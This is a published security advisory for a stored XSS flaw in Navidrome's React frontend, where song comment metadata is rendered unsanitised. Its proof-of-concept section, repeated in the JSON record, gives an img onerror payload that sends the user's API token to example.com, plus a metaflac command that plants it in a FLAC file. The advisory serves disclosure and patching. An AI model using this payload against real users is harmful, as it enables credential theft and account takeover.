GHSA-RH3R-8PXM-HG4W

Vulnerability from github – Published: 2026-02-04 00:12 – Updated: 2026-02-05 00:37
VLAI?
Summary
Navidrome has XSS via comment from song metadata
Details

Summary

An XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.

An attacker's maliciously crafted song has to be added to Navidrome to exploit the vulnerability.

Details

The frontend is using React. In various places, the code uses the dangerouslySetInnerHTML escape hatch to set the content of an HTML element.

In some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.

In MultiLineTextField component, the input is split into lines and rendered through the dangerouslySetInnerHTML property. 

<div
  data-testid={`${source}.${idx}`}
  key={md5(line + idx)}
  dangerouslySetInnerHTML={{ __html: line }}
/>

This component is then used in the SongInfo and AlbumInfo components, when rendering the comment of the song or album. The contents of the comments field is taken verbatim from the metadata of a song, such as the VORBIS COMMENT comment of a FLAC file.

By crafting the contents of the comment field, an attacker can inject code into the frontend, which runs whenever a user views the song or album info.

Additionally, as the Navidrome API token is kept in local storage and since there's no CSP in place unless the user's configured one outside of Navidrome, the attacker can exfiltrate the API token.

PoC

  1. Modify the comment field of a song to contain the following payload using a tool like MusicBrain'z Picard:
<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem('token')}`)" />

or use metaflac:

echo '<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem('token')}`)" />' | metaflac --set-tag=comment=<(cat) file.flac
  1. Add the song to Navidrome
  2. Enter the "Songs" or one of the albums page, click the "kebab menu" and then "Get Info"

In this payload, a broken image can be seen in the info dialog.

image

In the developer tools' network inspector, the request exfiltrating the token to an example domain can be seen.

image

Impact

The vulnerability affects users of the Navidrome UI with songs from untrusted sources.

Mitigations

Severity ?
6.1 (Medium)
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/navidrome/navidrome"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.60.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25578"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-04T00:12:20Z",
    "nvd_published_at": "2026-02-04T22:16:01Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nAn XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.\n\nAn attacker\u0027s maliciously crafted song has to be added to Navidrome to exploit the vulnerability.\n\n### Details\n\nThe frontend is using React. In various places, the code uses the `dangerouslySetInnerHTML` escape hatch to set the content of an HTML element.\n\nIn some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.\n\nIn `MultiLineTextField` component, the input is split into lines and rendered through the `dangerouslySetInnerHTML` property. \n\n```js\n\u003cdiv\n  data-testid={`${source}.${idx}`}\n  key={md5(line + idx)}\n  dangerouslySetInnerHTML={{ __html: line }}\n/\u003e\n```\n\nThis component is then used in the `SongInfo` and `AlbumInfo` components, when rendering the comment of the song or album. The contents of the comments field is taken verbatim from the metadata of a song, such as the VORBIS `COMMENT` comment of a FLAC file.\n\nBy crafting the contents of the comment field, an attacker can inject code into the frontend, which runs whenever a user views the song or album info.\n\nAdditionally, as the Navidrome API token is kept in local storage and since there\u0027s no CSP in place unless the user\u0027s configured one outside of Navidrome, the attacker can exfiltrate the API token.\n\n### PoC\n\n1. Modify the comment field of a song to contain the following payload using a tool like MusicBrain\u0027z Picard:\n\n```js\n\u003cimg src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem(\u0027token\u0027)}`)\" /\u003e\n```\n\nor use `metaflac`:\n\n```shell\necho \u0027\u003cimg src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem(\u0027token\u0027)}`)\" /\u003e\u0027 | metaflac --set-tag=comment=\u003c(cat) file.flac\n```\n\n2. Add the song to Navidrome\n3. Enter the \"Songs\" or one of the albums page, click the \"kebab menu\" and then \"Get Info\"\n\nIn this payload, a broken image can be seen in the info dialog.\n\n\u003cimg width=\"996\" height=\"660\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1467cdff-17b2-4dc6-9fb5-0a83c021ca04\" /\u003e\n\nIn the developer tools\u0027 network inspector, the request exfiltrating the token to an example domain can be seen.\n\n\u003cimg width=\"410\" height=\"34\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3f668797-63a6-4355-ae57-e95bde444143\" /\u003e\n\n\n### Impact\n\nThe vulnerability affects users of the Navidrome UI with songs from untrusted sources.\n\n### Mitigations\n\n- Users of Navidrome should configure a strict [[Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) in their reverse-proxy to make exfiltration more difficult\n- Users of Navidrome should not index songs from untrusted sources without first vetting their metadata",
  "id": "GHSA-rh3r-8pxm-hg4w",
  "modified": "2026-02-05T00:37:01Z",
  "published": "2026-02-04T00:12:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25578"
    },
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/navidrome/navidrome"
    },
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/releases/tag/v0.60.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Navidrome has XSS via comment from song metadata"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.